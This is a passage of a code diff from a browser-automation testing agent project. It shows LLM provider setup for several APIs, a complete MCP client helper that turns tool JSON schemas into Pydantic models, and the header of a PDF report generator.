return DeepSeekR1ChatOllama(
|
| 265 |
+
model=kwargs.get("model_name", "deepseek-r1:14b"),
|
| 266 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 267 |
+
num_ctx=kwargs.get("num_ctx", 32000),
|
| 268 |
+
base_url=base_url,
|
| 269 |
+
)
|
| 270 |
+
else:
|
| 271 |
+
return ChatOllama(
|
| 272 |
+
model=kwargs.get("model_name", "qwen2.5:7b"),
|
| 273 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 274 |
+
num_ctx=kwargs.get("num_ctx", 32000),
|
| 275 |
+
num_predict=kwargs.get("num_predict", 1024),
|
| 276 |
+
base_url=base_url,
|
| 277 |
+
)
|
| 278 |
+
elif provider == "azure_openai":
|
| 279 |
+
if not kwargs.get("base_url", ""):
|
| 280 |
+
base_url = os.getenv("AZURE_OPENAI_ENDPOINT", "")
|
| 281 |
+
else:
|
| 282 |
+
base_url = kwargs.get("base_url")
|
| 283 |
+
api_version = kwargs.get("api_version", "") or os.getenv("AZURE_OPENAI_API_VERSION", "2025-01-01-preview")
|
| 284 |
+
return AzureChatOpenAI(
|
| 285 |
+
model=kwargs.get("model_name", "gpt-4o"),
|
| 286 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 287 |
+
api_version=api_version,
|
| 288 |
+
azure_endpoint=base_url,
|
| 289 |
+
api_key=api_key,
|
| 290 |
+
)
|
| 291 |
+
elif provider == "alibaba":
|
| 292 |
+
if not kwargs.get("base_url", ""):
|
| 293 |
+
base_url = os.getenv("ALIBABA_ENDPOINT", "https://dashscope.aliyuncs.com/compatible-mode/v1")
|
| 294 |
+
else:
|
| 295 |
+
base_url = kwargs.get("base_url")
|
| 296 |
+
|
| 297 |
+
return ChatOpenAI(
|
| 298 |
+
model=kwargs.get("model_name", "qwen-plus"),
|
| 299 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 300 |
+
base_url=base_url,
|
| 301 |
+
api_key=api_key,
|
| 302 |
+
)
|
| 303 |
+
elif provider == "ibm":
|
| 304 |
+
parameters = {
|
| 305 |
+
"temperature": kwargs.get("temperature", 0.0),
|
| 306 |
+
"max_tokens": kwargs.get("num_ctx", 32000)
|
| 307 |
+
}
|
| 308 |
+
if not kwargs.get("base_url", ""):
|
| 309 |
+
base_url = os.getenv("IBM_ENDPOINT", "https://us-south.ml.cloud.ibm.com")
|
| 310 |
+
else:
|
| 311 |
+
base_url = kwargs.get("base_url")
|
| 312 |
+
|
| 313 |
+
return ChatWatsonx(
|
| 314 |
+
model_id=kwargs.get("model_name", "ibm/granite-vision-3.1-2b-preview"),
|
| 315 |
+
url=base_url,
|
| 316 |
+
project_id=os.getenv("IBM_PROJECT_ID"),
|
| 317 |
+
apikey=os.getenv("IBM_API_KEY"),
|
| 318 |
+
params=parameters
|
| 319 |
+
)
|
| 320 |
+
elif provider == "moonshot":
|
| 321 |
+
return ChatOpenAI(
|
| 322 |
+
model=kwargs.get("model_name", "moonshot-v1-32k-vision-preview"),
|
| 323 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 324 |
+
base_url=os.getenv("MOONSHOT_ENDPOINT"),
|
| 325 |
+
api_key=os.getenv("MOONSHOT_API_KEY"),
|
| 326 |
+
)
|
| 327 |
+
elif provider == "unbound":
|
| 328 |
+
return ChatOpenAI(
|
| 329 |
+
model=kwargs.get("model_name", "gpt-4o-mini"),
|
| 330 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 331 |
+
base_url=os.getenv("UNBOUND_ENDPOINT", "https://api.getunbound.ai"),
|
| 332 |
+
api_key=api_key,
|
| 333 |
+
)
|
| 334 |
+
elif provider == "siliconflow":
|
| 335 |
+
if not kwargs.get("api_key", ""):
|
| 336 |
+
api_key = os.getenv("SiliconFLOW_API_KEY", "")
|
| 337 |
+
else:
|
| 338 |
+
api_key = kwargs.get("api_key")
|
| 339 |
+
if not kwargs.get("base_url", ""):
|
| 340 |
+
base_url = os.getenv("SiliconFLOW_ENDPOINT", "")
|
| 341 |
+
else:
|
| 342 |
+
base_url = kwargs.get("base_url")
|
| 343 |
+
return ChatOpenAI(
|
| 344 |
+
api_key=api_key,
|
| 345 |
+
base_url=base_url,
|
| 346 |
+
model_name=kwargs.get("model_name", "Qwen/QwQ-32B"),
|
| 347 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 348 |
+
)
|
| 349 |
+
elif provider == "modelscope":
|
| 350 |
+
if not kwargs.get("api_key", ""):
|
| 351 |
+
api_key = os.getenv("MODELSCOPE_API_KEY", "")
|
| 352 |
+
else:
|
| 353 |
+
api_key = kwargs.get("api_key")
|
| 354 |
+
if not kwargs.get("base_url", ""):
|
| 355 |
+
base_url = os.getenv("MODELSCOPE_ENDPOINT", "")
|
| 356 |
+
else:
|
| 357 |
+
base_url = kwargs.get("base_url")
|
| 358 |
+
return ChatOpenAI(
|
| 359 |
+
api_key=api_key,
|
| 360 |
+
base_url=base_url,
|
| 361 |
+
model_name=kwargs.get("model_name", "Qwen/QwQ-32B"),
|
| 362 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 363 |
+
extra_body = {"enable_thinking": False}
|
| 364 |
+
)
|
| 365 |
+
else:
|
| 366 |
+
raise ValueError(f"Unsupported provider: {provider}")
|
src/utils/mcp_client.py
ADDED
|
@@ -0,0 +1,254 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import inspect
|
| 2 |
+
import logging
|
| 3 |
+
import uuid
|
| 4 |
+
from datetime import date, datetime, time
|
| 5 |
+
from enum import Enum
|
| 6 |
+
from typing import Any, Dict, List, Optional, Set, Type, Union, get_type_hints
|
| 7 |
+
|
| 8 |
+
from browser_use.controller.registry.views import ActionModel
|
| 9 |
+
from langchain.tools import BaseTool
|
| 10 |
+
from langchain_mcp_adapters.client import MultiServerMCPClient
|
| 11 |
+
from pydantic import BaseModel, Field, create_model
|
| 12 |
+
from pydantic.v1 import BaseModel, Field
|
| 13 |
+
|
| 14 |
+
logger = logging.getLogger(__name__)
|
| 15 |
+
|
| 16 |
+
|
| 17 |
+
async def setup_mcp_client_and_tools(mcp_server_config: Dict[str, Any]) -> Optional[MultiServerMCPClient]:
|
| 18 |
+
"""
|
| 19 |
+
Initializes the MultiServerMCPClient, connects to servers, fetches tools,
|
| 20 |
+
filters them, and returns a flat list of usable tools and the client instance.
|
| 21 |
+
|
| 22 |
+
Returns:
|
| 23 |
+
A tuple containing:
|
| 24 |
+
- list[BaseTool]: The filtered list of usable LangChain tools.
|
| 25 |
+
- MultiServerMCPClient | None: The initialized and started client instance, or None on failure.
|
| 26 |
+
"""
|
| 27 |
+
|
| 28 |
+
logger.info("Initializing MultiServerMCPClient...")
|
| 29 |
+
|
| 30 |
+
if not mcp_server_config:
|
| 31 |
+
logger.error("No MCP server configuration provided.")
|
| 32 |
+
return None
|
| 33 |
+
|
| 34 |
+
try:
|
| 35 |
+
if "mcpServers" in mcp_server_config:
|
| 36 |
+
mcp_server_config = mcp_server_config["mcpServers"]
|
| 37 |
+
client = MultiServerMCPClient(mcp_server_config)
|
| 38 |
+
await client.__aenter__()
|
| 39 |
+
return client
|
| 40 |
+
|
| 41 |
+
except Exception as e:
|
| 42 |
+
logger.error(f"Failed to setup MCP client or fetch tools: {e}", exc_info=True)
|
| 43 |
+
return None
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def create_tool_param_model(tool: BaseTool) -> Type[BaseModel]:
|
| 47 |
+
"""Creates a Pydantic model from a LangChain tool's schema"""
|
| 48 |
+
|
| 49 |
+
# Get tool schema information
|
| 50 |
+
json_schema = tool.args_schema
|
| 51 |
+
tool_name = tool.name
|
| 52 |
+
|
| 53 |
+
# If the tool already has a schema defined, convert it to a new param_model
|
| 54 |
+
if json_schema is not None:
|
| 55 |
+
|
| 56 |
+
# Create new parameter model
|
| 57 |
+
params = {}
|
| 58 |
+
|
| 59 |
+
# Process properties if they exist
|
| 60 |
+
if 'properties' in json_schema:
|
| 61 |
+
# Find required fields
|
| 62 |
+
required_fields: Set[str] = set(json_schema.get('required', []))
|
| 63 |
+
|
| 64 |
+
for prop_name, prop_details in json_schema['properties'].items():
|
| 65 |
+
field_type = resolve_type(prop_details, f"{tool_name}_{prop_name}")
|
| 66 |
+
|
| 67 |
+
# Check if parameter is required
|
| 68 |
+
is_required = prop_name in required_fields
|
| 69 |
+
|
| 70 |
+
# Get default value and description
|
| 71 |
+
default_value = prop_details.get('default', ... if is_required else None)
|
| 72 |
+
description = prop_details.get('description', '')
|
| 73 |
+
|
| 74 |
+
# Add field constraints
|
| 75 |
+
field_kwargs = {'default': default_value}
|
| 76 |
+
if description:
|
| 77 |
+
field_kwargs['description'] = description
|
| 78 |
+
|
| 79 |
+
# Add additional constraints if present
|
| 80 |
+
if 'minimum' in prop_details:
|
| 81 |
+
field_kwargs['ge'] = prop_details['minimum']
|
| 82 |
+
if 'maximum' in prop_details:
|
| 83 |
+
field_kwargs['le'] = prop_details['maximum']
|
| 84 |
+
if 'minLength' in prop_details:
|
| 85 |
+
field_kwargs['min_length'] = prop_details['minLength']
|
| 86 |
+
if 'maxLength' in prop_details:
|
| 87 |
+
field_kwargs['max_length'] = prop_details['maxLength']
|
| 88 |
+
if 'pattern' in prop_details:
|
| 89 |
+
field_kwargs['pattern'] = prop_details['pattern']
|
| 90 |
+
|
| 91 |
+
# Add to parameters dictionary
|
| 92 |
+
params[prop_name] = (field_type, Field(**field_kwargs))
|
| 93 |
+
|
| 94 |
+
return create_model(
|
| 95 |
+
f'{tool_name}_parameters',
|
| 96 |
+
__base__=ActionModel,
|
| 97 |
+
**params, # type: ignore
|
| 98 |
+
)
|
| 99 |
+
|
| 100 |
+
# If no schema is defined, extract parameters from the _run method
|
| 101 |
+
run_method = tool._run
|
| 102 |
+
sig = inspect.signature(run_method)
|
| 103 |
+
|
| 104 |
+
# Get type hints for better type information
|
| 105 |
+
try:
|
| 106 |
+
type_hints = get_type_hints(run_method)
|
| 107 |
+
except Exception:
|
| 108 |
+
type_hints = {}
|
| 109 |
+
|
| 110 |
+
params = {}
|
| 111 |
+
for name, param in sig.parameters.items():
|
| 112 |
+
# Skip 'self' parameter and any other parameters you want to exclude
|
| 113 |
+
if name == 'self':
|
| 114 |
+
continue
|
| 115 |
+
|
| 116 |
+
# Get annotation from type hints if available, otherwise from signature
|
| 117 |
+
annotation = type_hints.get(name, param.annotation)
|
| 118 |
+
if annotation == inspect.Parameter.empty:
|
| 119 |
+
annotation = Any
|
| 120 |
+
|
| 121 |
+
# Use default value if available, otherwise make it required
|
| 122 |
+
if param.default != param.empty:
|
| 123 |
+
params[name] = (annotation, param.default)
|
| 124 |
+
else:
|
| 125 |
+
params[name] = (annotation, ...)
|
| 126 |
+
|
| 127 |
+
return create_model(
|
| 128 |
+
f'{tool_name}_parameters',
|
| 129 |
+
__base__=ActionModel,
|
| 130 |
+
**params, # type: ignore
|
| 131 |
+
)
|
| 132 |
+
|
| 133 |
+
|
| 134 |
+
def resolve_type(prop_details: Dict[str, Any], prefix: str = "") -> Any:
|
| 135 |
+
"""Recursively resolves JSON schema type to Python/Pydantic type"""
|
| 136 |
+
|
| 137 |
+
# Handle reference types
|
| 138 |
+
if '$ref' in prop_details:
|
| 139 |
+
# In a real application, reference resolution would be needed
|
| 140 |
+
return Any
|
| 141 |
+
|
| 142 |
+
# Basic type mapping
|
| 143 |
+
type_mapping = {
|
| 144 |
+
'string': str,
|
| 145 |
+
'integer': int,
|
| 146 |
+
'number': float,
|
| 147 |
+
'boolean': bool,
|
| 148 |
+
'array': List,
|
| 149 |
+
'object': Dict,
|
| 150 |
+
'null': type(None),
|
| 151 |
+
}
|
| 152 |
+
|
| 153 |
+
# Handle formatted strings
|
| 154 |
+
if prop_details.get('type') == 'string' and 'format' in prop_details:
|
| 155 |
+
format_mapping = {
|
| 156 |
+
'date-time': datetime,
|
| 157 |
+
'date': date,
|
| 158 |
+
'time': time,
|
| 159 |
+
'email': str,
|
| 160 |
+
'uri': str,
|
| 161 |
+
'url': str,
|
| 162 |
+
'uuid': uuid.UUID,
|
| 163 |
+
'binary': bytes,
|
| 164 |
+
}
|
| 165 |
+
return format_mapping.get(prop_details['format'], str)
|
| 166 |
+
|
| 167 |
+
# Handle enum types
|
| 168 |
+
if 'enum' in prop_details:
|
| 169 |
+
enum_values = prop_details['enum']
|
| 170 |
+
# Create dynamic enum class with safe names
|
| 171 |
+
enum_dict = {}
|
| 172 |
+
for i, v in enumerate(enum_values):
|
| 173 |
+
# Ensure enum names are valid Python identifiers
|
| 174 |
+
if isinstance(v, str):
|
| 175 |
+
key = v.upper().replace(' ', '_').replace('-', '_')
|
| 176 |
+
if not key.isidentifier():
|
| 177 |
+
key = f"VALUE_{i}"
|
| 178 |
+
else:
|
| 179 |
+
key = f"VALUE_{i}"
|
| 180 |
+
enum_dict[key] = v
|
| 181 |
+
|
| 182 |
+
# Only create enum if we have values
|
| 183 |
+
if enum_dict:
|
| 184 |
+
return Enum(f"{prefix}_Enum", enum_dict)
|
| 185 |
+
return str # Fallback
|
| 186 |
+
|
| 187 |
+
# Handle array types
|
| 188 |
+
if prop_details.get('type') == 'array' and 'items' in prop_details:
|
| 189 |
+
item_type = resolve_type(prop_details['items'], f"{prefix}_item")
|
| 190 |
+
return List[item_type] # type: ignore
|
| 191 |
+
|
| 192 |
+
# Handle object types with properties
|
| 193 |
+
if prop_details.get('type') == 'object' and 'properties' in prop_details:
|
| 194 |
+
nested_params = {}
|
| 195 |
+
for nested_name, nested_details in prop_details['properties'].items():
|
| 196 |
+
nested_type = resolve_type(nested_details, f"{prefix}_{nested_name}")
|
| 197 |
+
# Get required field info
|
| 198 |
+
required_fields = prop_details.get('required', [])
|
| 199 |
+
is_required = nested_name in required_fields
|
| 200 |
+
default_value = nested_details.get('default', ... if is_required else None)
|
| 201 |
+
description = nested_details.get('description', '')
|
| 202 |
+
|
| 203 |
+
field_kwargs = {'default': default_value}
|
| 204 |
+
if description:
|
| 205 |
+
field_kwargs['description'] = description
|
| 206 |
+
|
| 207 |
+
nested_params[nested_name] = (nested_type, Field(**field_kwargs))
|
| 208 |
+
|
| 209 |
+
# Create nested model
|
| 210 |
+
nested_model = create_model(f"{prefix}_Model", **nested_params)
|
| 211 |
+
return nested_model
|
| 212 |
+
|
| 213 |
+
# Handle union types (oneOf, anyOf)
|
| 214 |
+
if 'oneOf' in prop_details or 'anyOf' in prop_details:
|
| 215 |
+
union_schema = prop_details.get('oneOf') or prop_details.get('anyOf')
|
| 216 |
+
union_types = []
|
| 217 |
+
for i, t in enumerate(union_schema):
|
| 218 |
+
union_types.append(resolve_type(t, f"{prefix}_{i}"))
|
| 219 |
+
|
| 220 |
+
if union_types:
|
| 221 |
+
return Union.__getitem__(tuple(union_types)) # type: ignore
|
| 222 |
+
return Any
|
| 223 |
+
|
| 224 |
+
# Handle allOf (intersection types)
|
| 225 |
+
if 'allOf' in prop_details:
|
| 226 |
+
nested_params = {}
|
| 227 |
+
for i, schema_part in enumerate(prop_details['allOf']):
|
| 228 |
+
if 'properties' in schema_part:
|
| 229 |
+
for nested_name, nested_details in schema_part['properties'].items():
|
| 230 |
+
nested_type = resolve_type(nested_details, f"{prefix}_allOf_{i}_{nested_name}")
|
| 231 |
+
# Check if required
|
| 232 |
+
required_fields = schema_part.get('required', [])
|
| 233 |
+
is_required = nested_name in required_fields
|
| 234 |
+
nested_params[nested_name] = (nested_type, ... if is_required else None)
|
| 235 |
+
|
| 236 |
+
# Create composite model
|
| 237 |
+
if nested_params:
|
| 238 |
+
composite_model = create_model(f"{prefix}_CompositeModel", **nested_params)
|
| 239 |
+
return composite_model
|
| 240 |
+
return Dict
|
| 241 |
+
|
| 242 |
+
# Default to basic types
|
| 243 |
+
schema_type = prop_details.get('type', 'string')
|
| 244 |
+
if isinstance(schema_type, list):
|
| 245 |
+
# Handle multiple types (e.g., ["string", "null"])
|
| 246 |
+
non_null_types = [t for t in schema_type if t != 'null']
|
| 247 |
+
if non_null_types:
|
| 248 |
+
primary_type = type_mapping.get(non_null_types[0], Any)
|
| 249 |
+
if 'null' in schema_type:
|
| 250 |
+
return Optional[primary_type] # type: ignore
|
| 251 |
+
return primary_type
|
| 252 |
+
return Any
|
| 253 |
+
|
| 254 |
+
return type_mapping.get(schema_type, Any)
|
src/utils/pdf_report_generator.py
ADDED
|
@@ -0,0 +1,736 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - PDF Report Generator
|
| 3 |
+
===============================================================
|
| 4 |
+
|
| 5 |
+
Generates comprehensive PDF testing reports with screenshots, results, and analysis.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import json
|
| 14 |
+
import base64
|
| 15 |
+
from datetime import datetime
|
| 16 |
+
from pathlib import Path
|
| 17 |
+
from typing import List, Dict, Any, Optional
|
| 18 |
+
from reportlab.lib import colors
|
| 19 |
+
from reportlab.lib.pagesizes import letter, A4
|
| 20 |
+
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
|
| 21 |
+
from reportlab.lib.units import inch
|
| 22 |
+
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Table, TableStyle, Image, PageBreak
|
| 23 |
+
from reportlab.platypus.frames import Frame
|
| 24 |
+
from reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate
|
| 25 |
+
from reportlab.lib.enums import TA_CENTER, TA_LEFT, TA_RIGHT, TA_JUSTIFY
|
| 26 |
+
from reportlab.pdfgen import canvas
|
| 27 |
+
from reportlab.lib.utils import ImageReader
|
| 28 |
+
import io
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
class PDFReportGenerator:
|
| 32 |
+
"""Generates comprehensive PDF testing reports for the Fagun Browser Automation Testing Agent."""
|
